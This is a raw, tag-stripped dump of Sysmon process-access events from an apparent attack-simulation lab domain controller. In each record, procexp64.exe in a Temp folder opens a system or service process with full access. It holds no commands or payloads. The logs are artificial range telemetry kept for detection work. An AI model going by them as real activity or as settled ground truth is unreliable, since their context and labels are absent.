15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:14.830{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 